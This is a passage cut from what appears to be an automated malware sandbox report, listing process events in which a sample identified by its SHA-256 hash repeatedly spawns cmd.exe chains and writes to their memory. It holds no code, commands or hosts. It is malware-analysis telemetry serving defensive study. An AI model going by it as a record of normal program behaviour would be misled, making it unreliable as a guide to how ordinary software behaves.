wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 283 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 283 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 283 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 283 PID 1344 wrote to memory of 300 1344 cmd.exe 285 PID 1344 wrote to memory of 300 1344 cmd.exe 285 PID 1344 wrote to memory of 300 1344 cmd.exe 285 PID 1344 wrote to memory of 300 1344 cmd.exe 285 PID 1344 wrote to memory of 204 1344 cmd.exe 286 PID 1344 wrote to memory of 204 1344 cmd.exe 286 PID 1344 wrote to memory of 204 1344 cmd.exe 286 PID 1344 wrote to memory of 204 1344 cmd.exe 286 PID 1344 wrote to memory of 1808 1344 cmd.exe 287 PID 1344 wrote to memory of 1808 1344 cmd.exe 287 PID 1344 wrote to memory of 1808 1344 cmd.exe 287 PID 1344 wrote to memory of 1808 1344 cmd.exe 287 PID 1808 wrote to memory of 864 1808 cmd.exe 288 PID 1808 wrote to memory of 864 1808 cmd.exe 288 PID 1808 wrote to memory of 864 1808 cmd.exe 288 PID 1808 wrote to memory of 864 1808 cmd.exe 288 PID 1344 wrote to memory of 848 1344 cmd.exe 289 PID 1344 wrote to memory of 848 1344 cmd.exe 289 PID 1344 wrote to memory of 848 1344 cmd.exe 289 PID 1344 wrote to memory of 848 1344 cmd.exe 289 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 290 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 290 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 290 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 290 PID 1984 wrote to memory of 928 1984 cmd.exe 292 PID 1984 wrote to memory of 928 1984 cmd.exe 292 PID 1984 wrote to memory of 928 1984 cmd.exe 292 PID 1984 wrote to memory of 928 1984 cmd.exe 292 PID 1984 wrote to memory of 680 1984 cmd.exe 293 PID 1984 wrote to memory of 680 1984 cmd.exe 293 PID 1984 wrote to memory of 680 1984 cmd.exe 293 PID 1984 wrote to memory of 680 1984 cmd.exe 293 PID 1984 wrote to memory of 524 1984 cmd.exe 294 PID 1984 wrote to memory of 524 1984 cmd.exe 294 PID 1984 wrote to memory of 524 1984 cmd.exe 294 PID 1984 wrote to memory of 524 1984 cmd.exe 294 PID 524 wrote to memory of 292 524 cmd.exe 295 PID 524 wrote to memory of 292 524 cmd.exe 295 PID 524 wrote to memory of 292 524 cmd.exe 295 PID 524 wrote to memory of 292 524 cmd.exe 295 PID 1984 wrote to memory of 224 1984 cmd.exe 296 PID 1984 wrote to memory of 224 1984 cmd.exe 296 PID 1984 wrote to memory of 224 1984 cmd.exe 296 PID 1984 wrote to memory of 224 1984 cmd.exe 296 PID 1116 wrote to memory of 1480 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 297 PID 1116 wrote to memory of 1480 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 297 PID 1116 wrote to memory of 1480 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 297 PID 1116 wrote to memory of 1480 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 297 PID 1480 wrote to memory of 1372 1480 cmd.exe 299 PID 1480 wrote to memory of 1372 1480 cmd.exe 299 PID 1480 wrote to memory of 1372 1480 cmd.exe 299 PID 1480 wrote to memory of 1372 1480 cmd.exe 299 PID 1480 wrote to memory of 1864 1480 cmd.exe 300 PID 1480 wrote to memory of 1864 1480 cmd.exe 300 PID 1480 wrote to memory of 1864 1480 cmd.exe 300 PID 1480 wrote to memory of 1864 1480 cmd.exe 300 PID 1480 wrote to memory of 468 1480 cmd.exe 301 PID 1480 wrote to memory of 468 1480 cmd.exe 301 PID 1480 wrote to memory of 468 1480 cmd.exe 301 PID 1480 wrote to memory of 468 1480 cmd.exe 301 PID 468 wrote to memory of 1096 468 cmd.exe 302 PID 468 wrote to memory of 1096 468 cmd.exe 302 PID 468 wrote to memory of 1096 468 cmd.exe 302 PID 468 wrote to memory of 1096 468 cmd.exe 302 PID 1480 wrote to memory of 300 1480 cmd.exe 303 PID 1480 wrote to memory of 300 1480 cmd.exe 303 PID 1480 wrote to memory of 300 1480 cmd.exe 303 PID 1480 wrote to memory of 300 1480 cmd.exe 303 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 304 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 304 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 304 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 304 PID 1936 wrote to memory of 296 1936 cmd.exe 306 PID 1936 wrote to memory of 296 1936 cmd.exe 306 PID 1936 wrote to memory of 296 1936 cmd.exe 306 PID 1936 wrote to memory of 296 1936 cmd.exe 306 PID 1936 wrote to memory of 848 1936 cmd.exe 307 PID 1936 wrote to memory of 848 1936 cmd.exe 307 PID 1936 wrote to memory of 848 1936 cmd.exe 307 PID 1936 wrote to memory of 848 1936 cmd.exe 307 PID 1936 wrote to memory of 1344 1936 cmd.exe 308 PID 1936 wrote to memory of 1344 1936 cmd.exe 308 PID 1936 wrote to memory of 1344 1936 cmd.exe 308 PID 1936 wrote to memory of 1344 1936 cmd.exe 308 PID 1344 wrote to memory of 1960 1344 cmd.exe 309 PID 1344 wrote to memory of 1960 1344 cmd.exe 309 PID 1344 wrote to memory of 1960 1344 cmd.exe 309 PID 1344 wrote to memory of 1960 1344 cmd.exe 309 PID 1936 wrote to memory of 928 1936 cmd.exe 310 PID 1936 wrote to memory of 928 1936 cmd.exe 310 PID 1936 wrote to memory of 928 1936 cmd.exe 310 PID 1936 wrote to memory of 928 1936 cmd.exe 310 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 311 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 311 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 311 PID 1116 wrote to memory of 1888 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 311 PID 1888 wrote to memory of 1816 1888 cmd.exe 313 PID 1888 wrote to memory of 1816 1888 cmd.exe 313 PID 1888 wrote to memory of 1816 1888 cmd.exe 313 PID 1888 wrote to memory of 1816 1888 cmd.exe 313 PID 1888 wrote to memory of 1376 1888 cmd.exe 314 PID 1888 wrote to memory of 1376 1888 cmd.exe 314 PID 1888 wrote to memory of 1376 1888 cmd.exe 314 PID 1888 wrote to memory of 1376 1888 cmd.exe 314 PID 1888 wrote to memory of 1696 1888 cmd.exe 315 PID 1888 wrote to memory of 1696 1888 cmd.exe 315 PID 1888 wrote to memory of 1696 1888 cmd.exe 315 PID 1888 wrote to memory of 1696 1888 cmd.exe 315 PID 1696 wrote to memory of 232 1696 cmd.exe 316 PID 1696 wrote to memory of 232 1696 cmd.exe 316 PID 1696 wrote to memory of 232 1696 cmd.exe 316 PID 1696 wrote to memory of 232 1696 cmd.exe 316 PID 1888 wrote to memory of 1804 1888 cmd.exe 317 PID 1888 wrote to memory of 1804 1888 cmd.exe 317 PID 1888 wrote to memory of 1804 1888 cmd.exe 317 PID 1888 wrote to memory of 1804 1888 cmd.exe 317 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 318 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 318 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 318 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 318 PID 1412 wrote to memory of 1908 1412 cmd.exe 320 PID 1412 wrote to memory of 1908 1412 cmd.exe 320 PID 1412 wrote to memory of 1908 1412 cmd.exe 320 PID 1412 wrote to memory of 1908 1412 cmd.exe 320 PID 1412 wrote to memory of 1236 1412 cmd.exe 321 PID 1412 wrote to memory of 1236 1412 cmd.exe 321 PID 1412 wrote to memory of 1236 1412 cmd.exe 321 PID 1412 wrote to memory of 1236 1412 cmd.exe 321 PID 1412 wrote to memory of 1404 1412 cmd.exe 322 PID 1412 wrote to memory of 1404 1412 cmd.exe 322 PID 1412 wrote to memory of 1404 1412 cmd.exe 322 PID 1412 wrote to memory of 1404 1412 cmd.exe 322 PID 1404 wrote to memory of 1896 1404 cmd.exe 323 PID 1404 wrote to memory of 1896 1404 cmd.exe 323 PID 1404 wrote to memory of 1896 1404 cmd.exe 323 PID 1404 wrote to memory of 1896 1404 cmd.exe 323 PID 1412 wrote to memory of 1840 1412 cmd.exe 324 PID 1412 wrote to memory of 1840 1412 cmd.exe 324 PID 1412 wrote to memory of 1840 1412 cmd.exe 324 PID 1412 wrote to memory of 1840 1412 cmd.exe 324 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 325 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 325 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 325 PID 1116 wrote to memory of 1168 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 325 PID 1168 wrote to memory of 1820 1168 cmd.exe 327 PID 1168 wrote to memory of 1820 1168 cmd.exe 327 PID 1168 wrote to memory of 1820 1168 cmd.exe 327 PID 1168 wrote to memory of 1820 1168 cmd.exe 327 PID 1168 wrote to memory of 1420 1168 cmd.exe 328 PID 1168 wrote to memory of 1420 1168 cmd.exe 328 PID 1168 wrote to memory of 1420 1168 cmd.exe 328 PID 1168 wrote to memory of 1420 1168 cmd.exe 328 PID 1168 wrote to memory of 1912 1168 cmd.exe 329 PID 1168 wrote to memory of 1912 1168 cmd.exe 329 PID 1168 wrote to memory of 1912 1168 cmd.exe 329 PID 1168 wrote to memory of 1912 1168 cmd.exe 329 PID 1912 wrote to memory of 932 1912 cmd.exe 330 PID 1912 wrote to memory of 932 1912 cmd.exe 330 PID 1912 wrote to memory of 932 1912 cmd.exe 330 PID 1912 wrote to memory of 932 1912 cmd.exe 330 PID 1168 wrote to memory of 896 1168 cmd.exe 331 PID 1168 wrote to memory of 896 1168 cmd.exe 331 PID 1168 wrote to memory of 896 1168 cmd.exe 331 PID 1168 wrote to memory of 896 1168 cmd.exe 331 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 332 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 332 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 332 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 332 PID 964 wrote to memory of 916 964 cmd.exe 334 PID 964 wrote to memory of 916 964 cmd.exe 334 PID 964 wrote to memory of 916 964 cmd.exe 334 PID 964 wrote to memory of 916 964 cmd.exe 334 PID 964 wrote to memory of 1580 964 cmd.exe 335 PID 964 wrote to memory of 1580 964 cmd.exe 335 PID 964 wrote to memory of 1580 964 cmd.exe 335 PID 964 wrote to memory of 1580 964 cmd.exe 335 PID 964 wrote to memory of 1696 964 cmd.exe 336 PID 964 wrote to memory of 1696 964 cmd.exe 336 PID 964 wrote to memory of 1696 964 cmd.exe 336 PID 964 wrote to memory of 1696 964 cmd.exe 336 PID 1696 wrote to memory of 1864 1696 cmd.exe 337 PID 1696 wrote to memory of 1864 1696 cmd.exe 337 PID 1696 wrote to memory of 1864 1696 cmd.exe 337 PID 1696 wrote to memory of 1864 1696 cmd.exe 337 PID 964 wrote to memory of 1608 964 cmd.exe 338 PID 964 wrote to memory of 1608 964 cmd.exe 338 PID 964 wrote to memory of 1608 964 cmd.exe 338 PID 964 wrote to memory of 1608 964 cmd.exe 338 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 339 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 339 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 339 PID 1116 wrote to memory of 300 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 339 PID 300 wrote to memory of 864 300 cmd.exe 341 PID 300 wrote to memory of 864 300 cmd.exe 341 PID 300 wrote to memory of 864 300 cmd.exe 341 PID 300 wrote to memory of 864 300 cmd.exe 341 PID 300 wrote to memory of 1860 300 cmd.exe 342 PID 300 wrote to memory of 1860 300 cmd.exe 342 PID 300 wrote to memory of 1860 300 cmd.exe 342 PID 300 wrote to memory of 1860 300 cmd.exe 342 PID 300 wrote to memory of 1404 300 cmd.exe 343 PID 300 wrote to memory of 1404 300 cmd.exe 343 PID 300 wrote to memory of 1404 300 cmd.exe 343 PID 300 wrote to memory of 1404 300 cmd.exe 343 PID 1404 wrote to memory of 1468 1404 cmd.exe 344 PID 1404 wrote to memory of 1468 1404 cmd.exe 344 PID 1404 wrote to memory of 1468 1404 cmd.exe 344 PID 1404 wrote to memory of 1468 1404 cmd.exe 344 PID 300 wrote to memory of 1412 300 cmd.exe 345 PID 300 wrote to memory of 1412 300 cmd.exe 345 PID 300 wrote to memory of 1412 300 cmd.exe 345 PID 300 wrote to memory of 1412 300 cmd.exe 345 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 346 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 346 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 346 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 346 PID 928 wrote to memory of 292 928 cmd.exe 348 PID 928 wrote to memory of 292 928 cmd.exe 348 PID 928 wrote to memory of 292 928 cmd.exe 348 PID 928 wrote to memory of 292 928 cmd.exe 348 PID 928 wrote to memory of 900 928 cmd.exe 349 PID 928 wrote to memory of 900 928 cmd.exe 349 PID 928 wrote to memory of 900 928 cmd.exe 349 PID 928 wrote to memory of 900 928 cmd.exe 349 PID 928 wrote to memory of 1912 928 cmd.exe 350 PID 928 wrote to memory of 1912 928 cmd.exe 350 PID 928 wrote to memory of 1912 928 cmd.exe 350 PID 928 wrote to memory of 1912 928 cmd.exe 350 PID 1912 wrote to memory of 960 1912 cmd.exe 351 PID 1912 wrote to memory of 960 1912 cmd.exe 351 PID 1912 wrote to memory of 960 1912 cmd.exe 351 PID 1912 wrote to memory of 960 1912 cmd.exe 351 PID 928 wrote to memory of 1168 928 cmd.exe 352 PID 928 wrote to memory of 1168 928 cmd.exe 352 PID 928 wrote to memory of 1168 928 cmd.exe 352 PID 928 wrote to memory of 1168 928 cmd.exe 352 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 353 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 353 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 353 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 353 PID 1372 wrote to memory of 208 1372 cmd.exe 355 PID 1372 wrote to memory of 208 1372 cmd.exe 355 PID 1372 wrote to memory of 208 1372 cmd.exe 355 PID 1372 wrote to memory of 208 1372 cmd.exe 355 PID 1372 wrote to memory of 1864 1372 cmd.exe 356 PID 1372 wrote to memory of 1864 1372 cmd.exe 356 PID 1372 wrote to memory of 1864 1372 cmd.exe 356 PID 1372 wrote to memory of 1864 1372 cmd.exe 356 PID 1372 wrote to memory of 1888 1372 cmd.exe 357 PID 1372 wrote to memory of 1888 1372 cmd.exe 357 PID 1372 wrote to memory of 1888 1372 cmd.exe 357 PID 1372 wrote to memory of 1888 1372 cmd.exe 357 PID 1888 wrote to memory of 468 1888 cmd.exe 358 PID 1888 wrote to memory of 468 1888 cmd.exe 358 PID 1888 wrote to memory of 468 1888 cmd.exe 358 PID 1888 wrote to memory of 468 1888 cmd.exe 358 PID 1372 wrote to memory of 964 1372 cmd.exe 359 PID 1372 wrote to memory of 964 1372 cmd.exe 359 PID 1372 wrote to memory of 964 1372 cmd.exe 359 PID 1372 wrote to memory of 964 1372 cmd.exe 359 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 360 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 360 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 360 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 360 PID 296 wrote to memory of 1756 296 cmd.exe 362 PID 296 wrote to memory of 1756 296 cmd.exe 362 PID 296 wrote to memory of 1756 296 cmd.exe 362 PID 296 wrote to memory of 1756 296 cmd.exe 362 PID 296 wrote to memory of 848 296 cmd.exe 363 PID 296 wrote to memory of 848 296 cmd.exe 363 PID 296 wrote to memory of 848 296 cmd.exe 363 PID 296 wrote to memory of 848 296 cmd.exe 363 PID 296 wrote to memory of 1404 296 cmd.exe 364 PID 296 wrote to memory of 1404 296 cmd.exe 364 PID 296 wrote to memory of 1404 296 cmd.exe 364 PID 296 wrote to memory of 1404 296 cmd.exe 364 PID 1404 wrote to memory of 1344 1404 cmd.exe 365 PID 1404 wrote to memory of 1344 1404 cmd.exe 365 PID 1404 wrote to memory of 1344 1404 cmd.exe 365 PID 1404 wrote to memory of 1344 1404 cmd.exe 365 PID 296 wrote to memory of 1908 296 cmd.exe 366 PID 296 wrote to memory of 1908 296 cmd.exe 366 PID 296 wrote to memory of 1908 296 cmd.exe 366 PID 296 wrote to memory of 1908 296 cmd.exe 366 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 367 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 367 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 367 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 367 PID 1952 wrote to memory of 968 1952 cmd.exe 369 PID 1952 wrote to memory of 968 1952 cmd.exe 369 PID 1952 wrote to memory of 968 1952 cmd.exe 369 PID 1952 wrote to memory of 968 1952 cmd.exe 369 PID 1952 wrote to memory of 224 1952 cmd.exe 370 PID 1952 wrote to memory of 224 1952 cmd.exe 370 PID 1952 wrote to memory of 224 1952 cmd.exe 370 PID 1952 wrote to memory of 224 1952 cmd.exe 370 PID 1952 wrote to memory of 944 1952 cmd.exe 371 PID 1952 wrote to memory of 944 1952 cmd.exe 371 PID 1952 wrote to memory of 944 1952 cmd.exe 371 PID 1952 wrote to memory of 944 1952 cmd.exe 371 PID 944 wrote to memory of 236 944 cmd.exe 372 PID 944 wrote to memory of 236 944 cmd.exe 372 PID 944 wrote to memory of 236 944 cmd.exe 372 PID 944 wrote to memory of 236 944 cmd.exe 372 PID 1952 wrote to memory of 380 1952 cmd.exe 373 PID 1952 wrote to memory of 380 1952 cmd.exe 373 PID 1952 wrote to memory of 380 1952 cmd.exe 373 PID 1952 wrote to memory of 380 1952 cmd.exe 373 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 374 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 374 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 374 PID 1116 wrote to memory of 524 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 374 PID 524 wrote to memory of 1608 524 cmd.exe 376 PID 524 wrote to memory of 1608 524 cmd.exe 376 PID 524 wrote to memory of 1608 524 cmd.exe 376 PID 524 wrote to memory of 1608 524 cmd.exe 376 PID 524 wrote to memory of 468 524 cmd.exe 377 PID 524 wrote to memory of 468 524 cmd.exe 377 PID 524 wrote to memory of 468 524 cmd.exe 377 PID 524 wrote to memory of 468 524 cmd.exe 377 PID 524 wrote to memory of 940 524 cmd.exe 378 PID 524 wrote to memory of 940 524 cmd.exe 378 PID 524 wrote to memory of 940 524 cmd.exe 378 PID 524 wrote to memory of 940 524 cmd.exe 378 PID 940 wrote to memory of 548 940 cmd.exe 379 PID 940 wrote to memory of 548 940 cmd.exe 379 PID 940 wrote to memory of 548 940 cmd.exe 379 PID 940 wrote to memory of 548 940 cmd.exe 379 PID 524 wrote to memory of 1580 524 cmd.exe 380 PID 524 wrote to memory of 1580 524 cmd.exe 380 PID 524 wrote to memory of 1580 524 cmd.exe 380 PID 524 wrote to memory of 1580 524 cmd.exe 380 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 381 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 381 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 381 PID 1116 wrote to memory of 212 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 381 PID 212 wrote to memory of 1412 212 cmd.exe 383 PID 212 wrote to memory of 1412 212 cmd.exe 383 PID 212 wrote to memory of 1412 212 cmd.exe 383 PID 212 wrote to memory of 1412 212 cmd.exe 383 PID 212 wrote to memory of 1344 212 cmd.exe 384 PID 212 wrote to memory of 1344 212 cmd.exe 384 PID 212 wrote to memory of 1344 212 cmd.exe 384 PID 212 wrote to memory of 1344 212 cmd.exe 384 PID 212 wrote to memory of 1808 212 cmd.exe 385 PID 212 wrote to memory of 1808 212 cmd.exe 385 PID 212 wrote to memory of 1808 212 cmd.exe 385 PID 212 wrote to memory of 1808 212 cmd.exe 385 PID 1808 wrote to memory of 1908 1808 cmd.exe 386 PID 1808 wrote to memory of 1908 1808 cmd.exe 386 PID 1808 wrote to memory of 1908 1808 cmd.exe 386 PID 1808 wrote to memory of 1908 1808 cmd.exe 386 PID 212 wrote to memory of 864 212 cmd.exe 387 PID 212 wrote to memory of 864 212 cmd.exe 387 PID 212 wrote to memory of 864 212 cmd.exe 387 PID 212 wrote to memory of 864 212 cmd.exe 387 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 388 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 388 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 388 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 388 PID 896 wrote to memory of 1936 896 cmd.exe 390 PID 896 wrote to memory of 1936 896 cmd.exe 390 PID 896 wrote to memory of 1936 896 cmd.exe 390 PID 896 wrote to memory of 1936 896 cmd.exe 390 PID 896 wrote to memory of 236 896 cmd.exe 391 PID 896 wrote to memory of 236 896 cmd.exe 391 PID 896 wrote to memory of 236 896 cmd.exe 391 PID 896 wrote to memory of 236 896 cmd.exe 391 PID 896 wrote to memory of 1772 896 cmd.exe 392 PID 896 wrote to memory of 1772 896 cmd.exe 392 PID 896 wrote to memory of 1772 896 cmd.exe 392 PID 896 wrote to memory of 1772 896 cmd.exe 392 PID 1772 wrote to memory of 900 1772 cmd.exe 393 PID 1772 wrote to memory of 900 1772 cmd.exe 393 PID 1772 wrote to memory of 900 1772 cmd.exe 393 PID 1772 wrote to memory of 900 1772 cmd.exe 393 PID 896 wrote to memory of 1752 896 cmd.exe 394 PID 896 wrote to memory of 1752 896 cmd.exe 394 PID 896 wrote to memory of 1752 896 cmd.exe 394 PID 896 wrote to memory of 1752 896 cmd.exe 394 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 395 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 395 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 395 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 395 PID 1376 wrote to memory of 232 1376 cmd.exe 397 PID 1376 wrote to memory of 232 1376 cmd.exe 397 PID 1376 wrote to memory of 232 1376 cmd.exe 397 PID 1376 wrote to memory of 232 1376 cmd.exe 397 PID 1376 wrote to memory of 1876 1376 cmd.exe 398 PID 1376 wrote to memory of 1876 1376 cmd.exe 398 PID 1376 wrote to memory of 1876 1376 cmd.exe 398 PID 1376 wrote to memory of 1876 1376 cmd.exe 398 PID 1376 wrote to memory of 756 1376 cmd.exe 399 PID 1376 wrote to memory of 756 1376 cmd.exe 399 PID 1376 wrote to memory of 756 1376 cmd.exe 399 PID 1376 wrote to memory of 756 1376 cmd.exe 399 PID 756 wrote to memory of 1864 756 cmd.exe 400 PID 756 wrote to memory of 1864 756 cmd.exe 400 PID 756 wrote to memory of 1864 756 cmd.exe 400 PID 756 wrote to memory of 1864 756 cmd.exe 400 PID 1376 wrote to memory of 1756 1376 cmd.exe 401 PID 1376 wrote to memory of 1756 1376 cmd.exe 401 PID 1376 wrote to memory of 1756 1376 cmd.exe 401 PID 1376 wrote to memory of 1756 1376 cmd.exe 401 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 402 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 402 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 402 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 402 PID 1412 wrote to memory of 220 1412 cmd.exe 404 PID 1412 wrote to memory of 220 1412 cmd.exe 404 PID 1412 wrote to memory of 220 1412 cmd.exe 404 PID 1412 wrote to memory of 220 1412 cmd.exe 404 PID 1412 wrote to memory of 484 1412 cmd.exe 405 PID 1412 wrote to memory of 484 1412 cmd.exe 405 PID 1412 wrote to memory of 484 1412 cmd.exe 